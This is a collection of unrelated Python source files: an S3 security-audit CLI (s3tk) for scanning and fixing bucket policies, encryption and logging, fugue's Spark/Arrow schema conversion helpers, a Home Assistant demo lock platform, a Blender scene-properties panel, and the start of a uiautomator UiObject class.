('Resource', 'arn:aws:s3:::%s/*' % bucket.name),
('Condition', {'StringNotEquals': {'s3:x-amz-acl': 'public-read'}})
])
def no_uploads_statement(bucket):
return OrderedDict([
('Sid', 'NoUploads'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name)
])
def encryption_statement(bucket):
return OrderedDict([
('Sid', 'Encryption'),
('Effect', 'Deny'),
('Principal', '*'),
('Action', 's3:PutObject'),
('Resource', 'arn:aws:s3:::%s/*' % bucket.name),
('Condition', {'StringNotEquals': {'s3:x-amz-server-side-encryption': 'AES256'}})
])
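# For illustration, encryption_statement for a bucket named "my-bucket"
# serializes (via json.dumps) to a policy statement like:
# {
#     "Sid": "Encryption",
#     "Effect": "Deny",
#     "Principal": "*",
#     "Action": "s3:PutObject",
#     "Resource": "arn:aws:s3:::my-bucket/*",
#     "Condition": {"StringNotEquals": {"s3:x-amz-server-side-encryption": "AES256"}}
# }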
def statement_matches(s1, s2):
s1 = dict(s1)
s2 = dict(s2)
s1.pop('Sid', None)
s2.pop('Sid', None)
return s1 == s2
def fetch_policy(bucket):
policy = None
try:
policy = bucket.Policy().policy
except botocore.exceptions.ClientError as e:
if 'NoSuchBucket' not in str(e):
raise
if policy:
policy = json.loads(policy, object_pairs_hook=OrderedDict)
return policy
def print_dns_bucket(name, buckets, found_buckets):
if not name in found_buckets:
puts(name)
with indent(2):
if name in buckets:
puts(colored.green('owned'))
else:
puts(colored.red('not owned'))
puts()
found_buckets.add(name)
def print_policy(policy):
with indent(2):
if any(policy['Statement']):
puts(colored.yellow(json.dumps(policy, indent=4)))
else:
puts(colored.yellow("None"))
def summarize(values):
summary = Counter(values)
puts()
puts("Summary")
for k, v in summary.most_common():
puts(k + ': ' + str(v))
def fetch_event_selectors():
# TODO get trails across all regions
# even regions without buckets may have multi-region trails
client = boto3.client('cloudtrail')
paginator = client.get_paginator('list_trails')
event_selectors = {}
for page in paginator.paginate():
for trail in page['Trails']:
name = trail['Name']
region_client = boto3.client('cloudtrail', region_name=trail['HomeRegion'])
response = region_client.get_event_selectors(TrailName=name)
for event_selector in response['EventSelectors']:
read_write_type = event_selector['ReadWriteType']
for data_resource in event_selector['DataResources']:
if data_resource['Type'] == 'AWS::S3::Object':
for value in data_resource['Values']:
if value == 'arn:aws:s3':
trail_response = region_client.get_trail(Name=name)['Trail']
if trail_response['IsMultiRegionTrail']:
bucket = ('global')
else:
bucket = ('region', trail['HomeRegion'])
path = ''
else:
parts = value.split("/", 2)
bucket = ('bucket', parts[0].replace('arn:aws:s3:::', ''))
path = parts[1]
if bucket not in event_selectors:
event_selectors[bucket] = []
event_selectors[bucket].append({'trail': name, 'path': path, 'read_write_type': read_write_type})
return event_selectors
@click.group()
@click.version_option(version=__version__)
def cli():
pass
@cli.command()
@click.argument('buckets', nargs=-1)
@click.option('--log-bucket', multiple=True, help='Check log bucket(s)')
@click.option('--log-prefix', help='Check log prefix')
@click.option('--skip-logging', is_flag=True, help='Skip logging check')
@click.option('--skip-versioning', is_flag=True, help='Skip versioning check')
@click.option('--skip-default-encryption', is_flag=True, help='Skip default encryption check')
@click.option('--default-encryption', is_flag=True) # no op, can't hide from help until click 7 released
@click.option('--object-level-logging', is_flag=True)
@click.option('--sns-topic', help='Send SNS notification for failures')
def scan(buckets, log_bucket=None, log_prefix=None, skip_logging=False, skip_versioning=False, skip_default_encryption=False, default_encryption=True, object_level_logging=False, sns_topic=None):
event_selectors = fetch_event_selectors() if object_level_logging else {}
checks = []
for bucket in fetch_buckets(buckets):
puts(bucket.name)
checks.append(perform(AclCheck(bucket)))
checks.append(perform(PolicyCheck(bucket)))
checks.append(perform(PublicAccessCheck(bucket)))
if not skip_logging:
checks.append(perform(LoggingCheck(bucket, log_bucket=log_bucket, log_prefix=log_prefix)))
if not skip_versioning:
checks.append(perform(VersioningCheck(bucket)))
if not skip_default_encryption:
checks.append(perform(EncryptionCheck(bucket)))
if object_level_logging:
checks.append(perform(ObjectLoggingCheck(bucket, event_selectors=event_selectors)))
puts()
failed_checks = [c for c in checks if c.status != 'passed']
if any(failed_checks):
if sns_topic:
topic = boto3.resource('sns').Topic(sns_topic)
message = ''
for check in failed_checks:
msg = check.fail_message if check.status == 'failed' else 'access denied'
message += check.bucket.name + ': ' + check.name + ' ' + msg + '\n'
topic.publish(Message=message, Subject='[s3tk] Scan Failures')
sys.exit(1)
@cli.command(name='scan-dns')
def scan_dns():
buckets = set([b.name for b in s3().buckets.all()])
found_buckets = set()
client = boto3.client('route53')
paginator = client.get_paginator('list_hosted_zones')
for page in paginator.paginate():
for hosted_zone in page['HostedZones']:
paginator2 = client.get_paginator('list_resource_record_sets')
for page2 in paginator2.paginate(HostedZoneId=hosted_zone['Id']):
for resource_set in page2['ResourceRecordSets']:
if resource_set.get('AliasTarget'):
value = resource_set['AliasTarget']['DNSName']
if value.startswith('s3-website-') and value.endswith('.amazonaws.com.'):
print_dns_bucket(resource_set['Name'][:-1], buckets, found_buckets)
elif resource_set.get('ResourceRecords'):
for record in resource_set['ResourceRecords']:
value = record['Value']
if value.endswith('.s3.amazonaws.com'):
print_dns_bucket('.'.join(value.split('.')[:-3]), buckets, found_buckets)
if 's3-website-' in value and value.endswith('.amazonaws.com'):
print_dns_bucket(resource_set['Name'][:-1], buckets, found_buckets)
@cli.command(name='block-public-access')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def block_public_access(buckets, dry_run=False):
if not buckets:
abort('Must specify at least one bucket or wildcard')
fix_check(PublicAccessCheck, buckets, dry_run)
@cli.command(name='enable-logging')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
@click.option('--log-bucket', required=True, help='Bucket to store logs')
@click.option('--log-prefix', help='Log prefix')
def enable_logging(buckets, log_bucket=None, log_prefix=None, dry_run=False):
fix_check(LoggingCheck, buckets, dry_run, {'log_bucket': log_bucket, 'log_prefix': log_prefix})
@cli.command(name='enable-versioning')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def enable_versioning(buckets, dry_run=False):
fix_check(VersioningCheck, buckets, dry_run)
@cli.command(name='enable-default-encryption')
@click.argument('buckets', nargs=-1)
@click.option('--dry-run', is_flag=True, help='Dry run')
def enable_default_encryption(buckets, dry_run=False):
fix_check(EncryptionCheck, buckets, dry_run)
@cli.command()
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--dry-run', is_flag=True, help='Dry run')
@click.option('--kms-key-id', help='KMS key id')
@click.option('--customer-key', help='Customer key')
def encrypt(bucket, only=None, _except=None, dry_run=False, kms_key_id=None, customer_key=None):
summarize(parallelize(bucket, only, _except, encrypt_object, (dry_run, kms_key_id, customer_key,)))
@cli.command(name='scan-object-acl')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
def scan_object_acl(bucket, only=None, _except=None):
summarize(parallelize(bucket, only, _except, scan_object))
@cli.command(name='reset-object-acl')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--acl', default='private', help='ACL to use')
@click.option('--dry-run', is_flag=True, help='Dry run')
def reset_object_acl(bucket, only=None, _except=None, acl=None, dry_run=False):
summarize(parallelize(bucket, only, _except, reset_object, (dry_run, acl,)))
@cli.command(name='delete-unencrypted-versions')
@click.argument('bucket')
@click.option('--only', help='Only certain objects')
@click.option('--except', '_except', help='Except certain objects')
@click.option('--dry-run', is_flag=True, help='Dry run')
def delete_unencrypted_versions(bucket, only=None, _except=None, dry_run=False):
summarize(parallelize(bucket, only, _except, delete_unencrypted_version, (dry_run,), True))
@cli.command(name='list-policy')
@click.argument('buckets', nargs=-1)
@click.option('--named', is_flag=True, help='Print named statements')
def list_policy(buckets, named=False):
for bucket in fetch_buckets(buckets):
puts(bucket.name)
policy = fetch_policy(bucket)
with indent(2):
if policy is None:
puts(colored.yellow('None'))
else:
if named:
public = public_statement(bucket)
no_object_acl = no_object_acl_statement(bucket)
public_uploads = public_uploads_statement(bucket)
no_uploads = no_uploads_statement(bucket)
encryption = encryption_statement(bucket)
for statement in policy['Statement']:
if statement_matches(statement, public):
named_statement = 'Public'
elif statement_matches(statement, no_object_acl):
named_statement = 'No object ACL'
elif statement_matches(statement, public_uploads):
named_statement = 'Public uploads'
elif statement_matches(statement, no_uploads):
named_statement = 'No uploads'
elif statement_matches(statement, encryption):
named_statement = 'Encryption'
else:
named_statement = 'Custom'
puts(colored.yellow(named_statement))
else:
puts(colored.yellow(json.dumps(policy, indent=4)))
puts()
@cli.command(name='set-policy')
@click.argument('bucket')
@click.option('--public', is_flag=True, help='Make all objects public')
@click.option('--no-object-acl', is_flag=True, help='Prevent object ACL')
@click.option('--public-uploads', is_flag=True, help='Only public uploads')
@click.option('--no-uploads', is_flag=True, help='Prevent new uploads')
@click.option('--encryption', is_flag=True, help='Require encryption')
@click.option('--dry-run', is_flag=True, help='Dry run')
def set_policy(bucket, public=False, no_object_acl=False, public_uploads=False, no_uploads=False, encryption=False, dry_run=False):
bucket = s3().Bucket(bucket)
bucket_policy = bucket.Policy()
statements = []
if public:
statements.append(public_statement(bucket))
if no_object_acl:
statements.append(no_object_acl_statement(bucket))
if public_uploads:
statements.append(public_uploads_statement(bucket))
if no_uploads:
statements.append(no_uploads_statement(bucket))
if encryption:
statements.append(encryption_statement(bucket))
if any(statements):
puts('New policy')
policy = OrderedDict([
('Version', '2012-10-17'),
('Statement', statements)
])
print_policy(policy)
if not dry_run:
bucket_policy.put(Policy=json.dumps(policy))
else:
abort('No policies specified')
# experimental
@cli.command(name='update-policy')
@click.argument('bucket')
@click.option('--encryption/--no-encryption', default=None, help='Require encryption')
@click.option('--dry-run', is_flag=True, help='Dry run')
def update_policy(bucket, encryption=None, dry_run=False):
bucket = s3().Bucket(bucket)
policy = fetch_policy(bucket)
if not policy:
policy = OrderedDict([
('Version', '2012-10-17'),
('Statement', [])
])
es = encryption_statement(bucket)
es_index = next((i for i, s in enumerate(policy['Statement']) if statement_matches(s, es)), -1)
if es_index != -1:
if encryption:
puts("No encryption change")
print_policy(policy)
elif encryption is False:
puts("Removing encryption")
policy['Statement'].pop(es_index)
print_policy(policy)
if not dry_run:
if any(policy['Statement']):
bucket.Policy().put(Policy=json.dumps(policy))
else:
bucket.Policy().delete()
else:
if encryption:
puts("Adding encryption")
policy['Statement'].append(es)
print_policy(policy)
if not dry_run:
bucket.Policy().put(Policy=json.dumps(policy))
elif encryption is False:
puts(colored.yellow("No encryption change"))
print_policy(policy)
@cli.command(name='delete-policy')
@click.argument('bucket')
def delete_policy(bucket):
s3().Bucket(bucket).Policy().delete()
puts('Policy deleted')
|
fugue_spark/_utils/convert.py | kvnkho/fugue | 547 | 12610878 | from typing import Any, Iterable, List, Tuple
import pyarrow as pa
import pyspark.sql as ps
import pyspark.sql.types as pt
try: # pyspark < 3
from pyspark.sql.types import from_arrow_type, to_arrow_type # type: ignore
# https://issues.apache.org/jira/browse/SPARK-29041
pt._acceptable_types[pt.BinaryType] = (bytearray, bytes) # type: ignore # pragma: no cover # noqa: E501 # pylint: disable=line-too-long
except ImportError: # pyspark >=3
from pyspark.sql.pandas.types import from_arrow_type, to_arrow_type
from pyarrow.types import is_list, is_struct, is_timestamp
from triad.collections import Schema
from triad.utils.assertion import assert_arg_not_none, assert_or_throw
from triad.utils.pyarrow import TRIAD_DEFAULT_TIMESTAMP
def to_spark_schema(obj: Any) -> pt.StructType:
assert_arg_not_none(obj, "schema")
if isinstance(obj, pt.StructType):
return obj
if isinstance(obj, ps.DataFrame):
return obj.schema
return _from_arrow_schema(Schema(obj).pa_schema)
def to_schema(obj: Any) -> Schema:
assert_arg_not_none(obj, "obj")
if isinstance(obj, pt.StructType):
return Schema(_to_arrow_schema(obj))
if isinstance(obj, ps.DataFrame):
return to_schema(obj.schema)
return Schema(obj)
def to_cast_expression(
schema1: Any, schema2: Any, allow_name_mismatch: bool
) -> Tuple[bool, List[str]]:
schema1 = to_spark_schema(schema1)
schema2 = to_spark_schema(schema2)
assert_or_throw(
len(schema1) == len(schema2),
lambda: ValueError(f"schema mismatch: {schema1}, {schema2}"),
)
expr: List[str] = []
has_cast = False
for i in range(len(schema1)):
name_match = schema1[i].name == schema2[i].name
assert_or_throw(
name_match or allow_name_mismatch,
lambda: ValueError(f"schema name mismatch: {schema1}, {schema2}"),
)
if schema1[i].dataType != schema2[i].dataType:
type2 = schema2[i].dataType.simpleString()
if isinstance(schema1[i].dataType, pt.FractionalType) and isinstance(
schema2[i].dataType, (pt.StringType, pt.IntegralType)
):
expr.append(
f"CAST(IF(isnan({schema1[i].name}) OR {schema1[i].name} IS NULL"
f", NULL, {schema1[i].name})"
f" AS {type2}) {schema2[i].name}"
)
else:
expr.append(f"CAST({schema1[i].name} AS {type2}) {schema2[i].name}")
has_cast = True
else:
if schema1[i].name != schema2[i].name:
expr.append(f"{schema1[i].name} AS {schema2[i].name}")
has_cast = True
else:
expr.append(schema1[i].name)
return has_cast, expr
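# Illustration (not from the original source): given schema1 "a:int,b:int" and
# schema2 "a:string,c:int", to_cast_expression(schema1, schema2, True) returns
# has_cast=True and expressions like ["CAST(a AS string) a", "b AS c"]; when
# the source column is fractional, the IF(isnan(...) OR ... IS NULL, ...) guard
# above additionally maps NaN to NULL before casting.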
def to_select_expression(schema_from: Any, schema_to: Any) -> List[str]:
schema1 = to_spark_schema(schema_from)
if isinstance(schema_to, List):
return [schema1[n].name for n in schema_to]
schema2 = to_spark_schema(schema_to)
sub = pt.StructType([schema1[x.name] for x in schema2.fields])
_, expr = to_cast_expression(sub, schema2, allow_name_mismatch=False)
return expr
def to_type_safe_input(rows: Iterable[ps.Row], schema: Schema) -> Iterable[List[Any]]:
struct_idx = [p for p, t in enumerate(schema.types) if pa.types.is_struct(t)]
complex_list_idx = [
p
for p, t in enumerate(schema.types)
if pa.types.is_list(t) and pa.types.is_nested(t.value_type)
]
if len(struct_idx) == 0 and len(complex_list_idx) == 0:
for row in rows:
yield list(row)
elif len(complex_list_idx) == 0:
for row in rows:
r = list(row)
for i in struct_idx:
if r[i] is not None:
r[i] = r[i].asDict(recursive=True)
yield r
else:
for row in rows:
data = row.asDict(recursive=True)
r = [data[n] for n in schema.names]
yield r
# TODO: the following function always sets nullable to true,
# but should we use field.nullable?
def _to_arrow_type(dt: pt.DataType) -> pa.DataType:
if isinstance(dt, pt.TimestampType):
return TRIAD_DEFAULT_TIMESTAMP
if isinstance(dt, pt.StructType):
fields = [
pa.field(
# field.name, _to_arrow_type(field.dataType), nullable=field.nullable
field.name,
_to_arrow_type(field.dataType),
nullable=True,
)
for field in dt
]
return pa.struct(fields)
return to_arrow_type(dt)
def _to_arrow_schema(schema: pt.StructType) -> pa.Schema:
fields = [
# pa.field(field.name, _to_arrow_type(field.dataType), nullable=field.nullable)
pa.field(field.name, _to_arrow_type(field.dataType), nullable=True)
for field in schema
]
return pa.schema(fields)
def _from_arrow_type(dt: pa.DataType) -> pt.DataType:
if is_struct(dt):
return pt.StructType(
[
pt.StructField(
# field.name, _from_arrow_type(field.type), nullable=field.nullable
field.name,
_from_arrow_type(field.type),
nullable=True,
)
for field in dt
]
)
elif is_list(dt):
if is_timestamp(dt.value_type):
raise TypeError( # pragma: no cover
"Spark: unsupported type in conversion from Arrow: " + str(dt)
)
return pt.ArrayType(_from_arrow_type(dt.value_type))
return from_arrow_type(dt)
def _from_arrow_schema(schema: pa.Schema) -> pt.StructType:
return pt.StructType(
[
pt.StructField(
# field.name, _from_arrow_type(field.type), nullable=field.nullable
field.name,
_from_arrow_type(field.type),
nullable=True,
)
for field in schema
]
)
|
homeassistant/components/demo/lock.py | mtarjoianu/core | 1,635 | 12610889 | <reponame>mtarjoianu/core
"""Demo lock platform that has two fake locks."""
from __future__ import annotations
import asyncio
from homeassistant.components.lock import LockEntity, LockEntityFeature
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
STATE_JAMMED,
STATE_LOCKED,
STATE_LOCKING,
STATE_UNLOCKED,
STATE_UNLOCKING,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
LOCK_UNLOCK_DELAY = 2 # Used to give a realistic lock/unlock experience in frontend
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Demo lock platform."""
async_add_entities(
[
DemoLock("Front Door", STATE_LOCKED),
DemoLock("Kitchen Door", STATE_UNLOCKED),
DemoLock("Poorly Installed Door", STATE_UNLOCKED, False, True),
DemoLock("Openable Lock", STATE_LOCKED, True),
]
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Demo config entry."""
await async_setup_platform(hass, {}, async_add_entities)
class DemoLock(LockEntity):
"""Representation of a Demo lock."""
_attr_should_poll = False
def __init__(
self,
name: str,
state: str,
openable: bool = False,
jam_on_operation: bool = False,
) -> None:
"""Initialize the lock."""
self._attr_name = name
if openable:
self._attr_supported_features = LockEntityFeature.OPEN
self._state = state
self._openable = openable
self._jam_on_operation = jam_on_operation
@property
def is_locking(self):
"""Return true if lock is locking."""
return self._state == STATE_LOCKING
@property
def is_unlocking(self):
"""Return true if lock is unlocking."""
return self._state == STATE_UNLOCKING
@property
def is_jammed(self):
"""Return true if lock is jammed."""
return self._state == STATE_JAMMED
@property
def is_locked(self):
"""Return true if lock is locked."""
return self._state == STATE_LOCKED
async def async_lock(self, **kwargs):
"""Lock the device."""
self._state = STATE_LOCKING
self.async_write_ha_state()
await asyncio.sleep(LOCK_UNLOCK_DELAY)
if self._jam_on_operation:
self._state = STATE_JAMMED
else:
self._state = STATE_LOCKED
self.async_write_ha_state()
async def async_unlock(self, **kwargs):
"""Unlock the device."""
self._state = STATE_UNLOCKING
self.async_write_ha_state()
await asyncio.sleep(LOCK_UNLOCK_DELAY)
self._state = STATE_UNLOCKED
self.async_write_ha_state()
async def async_open(self, **kwargs):
"""Open the door latch."""
self._state = STATE_UNLOCKED
self.async_write_ha_state()
@property
def supported_features(self):
"""Flag supported features."""
if self._openable:
return LockEntityFeature.OPEN
return 0
|
release/scripts/startup/bl_ui/properties_scene.py | gunslingster/CSC581-assignement1 | 365 | 12610890 | <reponame>gunslingster/CSC581-assignement1
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import (
Panel,
UIList,
)
from rna_prop_ui import PropertyPanel
from bl_ui.properties_physics_common import (
point_cache_ui,
effector_weights_ui,
)
class SCENE_UL_keying_set_paths(UIList):
def draw_item(self, _context, layout, _data, item, icon, _active_data, _active_propname, _index):
        # assert(isinstance(item, bpy.types.KeyingSetPath))
kspath = item
icon = layout.enum_item_icon(kspath, "id_type", kspath.id_type)
if self.layout_type in {'DEFAULT', 'COMPACT'}:
# Do not make this one editable in uiList for now...
layout.label(text=kspath.data_path, translate=False, icon_value=icon)
elif self.layout_type == 'GRID':
layout.alignment = 'CENTER'
layout.label(text="", icon_value=icon)
class SceneButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
class SCENE_PT_scene(SceneButtonsPanel, Panel):
bl_label = "Scene"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
scene = context.scene
layout.prop(scene, "camera")
layout.prop(scene, "background_set")
layout.prop(scene, "active_clip", text="Active Clip")
class SCENE_PT_unit(SceneButtonsPanel, Panel):
bl_label = "Units"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
unit = context.scene.unit_settings
layout.use_property_split = True
layout.use_property_decorate = False
layout.prop(unit, "system")
col = layout.column()
col.enabled = unit.system != 'NONE'
col.prop(unit, "scale_length")
col.prop(unit, "use_separate")
col = layout.column()
col.prop(unit, "system_rotation", text="Rotation")
subcol = col.column()
subcol.enabled = unit.system != 'NONE'
subcol.prop(unit, "length_unit", text="Length")
subcol.prop(unit, "mass_unit", text="Mass")
subcol.prop(unit, "time_unit", text="Time")
subcol.prop(unit, "temperature_unit", text="Temperature")
class SceneKeyingSetsPanel:
@staticmethod
def draw_keyframing_settings(context, layout, ks, ksp):
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "Needed",
"use_insertkey_override_needed", "use_insertkey_needed",
userpref_fallback="use_keyframe_insert_needed",
)
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "Visual",
"use_insertkey_override_visual", "use_insertkey_visual",
userpref_fallback="use_visual_keying",
)
SceneKeyingSetsPanel._draw_keyframing_setting(
context, layout, ks, ksp, "XYZ to RGB",
"use_insertkey_override_xyz_to_rgb", "use_insertkey_xyz_to_rgb",
)
@staticmethod
def _draw_keyframing_setting(context, layout, ks, ksp, label, toggle_prop, prop, userpref_fallback=None):
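        # Draw one keyframing flag together with its override toggle: while the
        # item's override toggle is enabled its own flag is shown and editable,
        # otherwise the inherited value (keying set or user preferences) is
        # shown grayed out.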
if ksp:
item = ksp
if getattr(ks, toggle_prop):
owner = ks
propname = prop
else:
owner = context.preferences.edit
if userpref_fallback:
propname = userpref_fallback
else:
propname = prop
else:
item = ks
owner = context.preferences.edit
if userpref_fallback:
propname = userpref_fallback
else:
propname = prop
row = layout.row(align=True)
subrow = row.row(align=True)
subrow.active = getattr(item, toggle_prop)
if subrow.active:
subrow.prop(item, prop, text=label)
else:
subrow.prop(owner, propname, text=label)
row.prop(item, toggle_prop, text="", icon='STYLUS_PRESSURE', toggle=True) # XXX: needs dedicated icon
class SCENE_PT_keying_sets(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Keying Sets"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
scene = context.scene
row = layout.row()
col = row.column()
col.template_list("UI_UL_list", "keying_sets", scene, "keying_sets", scene.keying_sets, "active_index", rows=1)
col = row.column(align=True)
col.operator("anim.keying_set_add", icon='ADD', text="")
col.operator("anim.keying_set_remove", icon='REMOVE', text="")
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=False)
ks = scene.keying_sets.active
if ks and ks.is_path_absolute:
col = flow.column()
col.prop(ks, "bl_description")
subcol = flow.column()
subcol.operator_context = 'INVOKE_DEFAULT'
subcol.operator("anim.keying_set_export", text="Export to File").filepath = "keyingset.py"
class SCENE_PT_keyframing_settings(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Keyframing Settings"
bl_parent_id = "SCENE_PT_keying_sets"
@classmethod
def poll(cls, context):
ks = context.scene.keying_sets.active
return (ks and ks.is_path_absolute)
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False # No animation.
scene = context.scene
ks = scene.keying_sets.active
flow = layout.grid_flow(row_major=True, columns=0, even_columns=False, even_rows=False, align=True)
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.label(text="General Override")
self.draw_keyframing_settings(context, col, ks, None)
ksp = ks.paths.active
if ksp:
col.separator()
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.label(text="Active Set Override")
self.draw_keyframing_settings(context, col, ks, ksp)
class SCENE_PT_keying_set_paths(SceneButtonsPanel, SceneKeyingSetsPanel, Panel):
bl_label = "Active Keying Set"
bl_parent_id = "SCENE_PT_keying_sets"
@classmethod
def poll(cls, context):
ks = context.scene.keying_sets.active
return (ks and ks.is_path_absolute)
def draw(self, context):
layout = self.layout
scene = context.scene
ks = scene.keying_sets.active
row = layout.row()
row.label(text="Paths:")
row = layout.row()
col = row.column()
col.template_list("SCENE_UL_keying_set_paths", "", ks, "paths", ks.paths, "active_index", rows=1)
col = row.column(align=True)
col.operator("anim.keying_set_path_add", icon='ADD', text="")
col.operator("anim.keying_set_path_remove", icon='REMOVE', text="")
# TODO: 1) the template_any_ID needs to be fixed for the text alignment.
# 2) use_property_decorate has to properly skip the non animatable properties.
# Properties affected with needless draw:
# group_method, template_any_ID dropdown, use_entire_array
layout.use_property_split = True
layout.use_property_decorate = False # No animation (remove this later on).
flow = layout.grid_flow(row_major=False, columns=0, even_columns=False, even_rows=False, align=True)
ksp = ks.paths.active
if ksp:
col = flow.column(align=True)
col.alignment = 'RIGHT'
col.template_any_ID(ksp, "id", "id_type", text="Target ID-Block")
col.separator()
col.template_path_builder(ksp, "data_path", ksp.id, text="Data Path")
col = flow.column()
col.prop(ksp, "use_entire_array", text="Array All Items")
if not ksp.use_entire_array:
col.prop(ksp, "array_index", text="Index")
col.separator()
col.prop(ksp, "group_method", text="F-Curve Grouping")
if ksp.group_method == 'NAMED':
col.prop(ksp, "group")
class SCENE_PT_audio(SceneButtonsPanel, Panel):
bl_label = "Audio"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)
col = flow.column()
col.prop(scene, "audio_volume")
col.separator()
col = col.column(align=True)
col.prop(scene, "audio_distance_model")
col.prop(scene, "audio_doppler_speed", text="Doppler Speed")
col.prop(scene, "audio_doppler_factor", text="Doppler Factor")
col.separator()
layout.operator("sound.bake_animation")
class SCENE_PT_physics(SceneButtonsPanel, Panel):
bl_label = "Gravity"
bl_options = {'DEFAULT_CLOSED'}
def draw_header(self, context):
self.layout.prop(context.scene, "use_gravity", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
layout.active = scene.use_gravity
layout.prop(scene, "gravity")
class SCENE_PT_rigid_body_world(SceneButtonsPanel, Panel):
bl_label = "Rigid Body World"
bl_options = {'DEFAULT_CLOSED'}
def draw_header(self, context):
scene = context.scene
rbw = scene.rigidbody_world
if rbw is not None:
self.layout.prop(rbw, "enabled", text="")
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
rbw = scene.rigidbody_world
if rbw is None:
layout.operator("rigidbody.world_add")
else:
layout.operator("rigidbody.world_remove")
class RigidBodySubPanel(SceneButtonsPanel):
bl_parent_id = "SCENE_PT_rigid_body_world"
@classmethod
def poll(cls, context):
scene = context.scene
return scene and scene.rigidbody_world
class SCENE_PT_rigid_body_world_settings(RigidBodySubPanel, Panel):
bl_label = "Settings"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
scene = context.scene
rbw = scene.rigidbody_world
if rbw:
flow = layout.grid_flow(row_major=True, columns=0, even_columns=True, even_rows=False, align=True)
col = flow.column()
col.active = rbw.enabled
col = col.column()
col.prop(rbw, "collection")
col.prop(rbw, "constraints")
col = col.column()
col.prop(rbw, "time_scale", text="Speed")
col = flow.column()
col.active = rbw.enabled
col.prop(rbw, "use_split_impulse")
col = col.column()
col.prop(rbw, "substeps_per_frame")
col.prop(rbw, "solver_iterations")
class SCENE_PT_rigid_body_cache(RigidBodySubPanel, Panel):
bl_label = "Cache"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
scene = context.scene
rbw = scene.rigidbody_world
point_cache_ui(self, rbw.point_cache, rbw.point_cache.is_baked is False and rbw.enabled, 'RIGID_BODY')
class SCENE_PT_rigid_body_field_weights(RigidBodySubPanel, Panel):
bl_label = "Field Weights"
bl_parent_id = "SCENE_PT_rigid_body_world"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
scene = context.scene
rbw = scene.rigidbody_world
effector_weights_ui(self, rbw.effector_weights, 'RIGID_BODY')
class SCENE_PT_custom_props(SceneButtonsPanel, PropertyPanel, Panel):
_context_path = "scene"
_property_type = bpy.types.Scene
classes = (
SCENE_UL_keying_set_paths,
SCENE_PT_scene,
SCENE_PT_unit,
SCENE_PT_physics,
SCENE_PT_keying_sets,
SCENE_PT_keying_set_paths,
SCENE_PT_keyframing_settings,
SCENE_PT_audio,
SCENE_PT_rigid_body_world,
SCENE_PT_rigid_body_world_settings,
SCENE_PT_rigid_body_cache,
SCENE_PT_rigid_body_field_weights,
SCENE_PT_custom_props,
)
if __name__ == "__main__": # only for live edit.
from bpy.utils import register_class
for cls in classes:
register_class(cls)
|
python_uiautomator/ui_object.py | maksonlee/android-uiconductor | 113 | 12610898 | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""UiObject is the class that stores the UiObject for automation.
It contains xml info and a selector for a certain component.
"""
from .constant import DirectionType
from .xml_parser import XmlParser
class UiObject():
"""UiObject class for python_uiautomator, stands for UiObject class in uiautomator.
Attributes:
selector: corresponding UiSelector of the current UiObject.
android_device_driver: android_device_driver for android device.
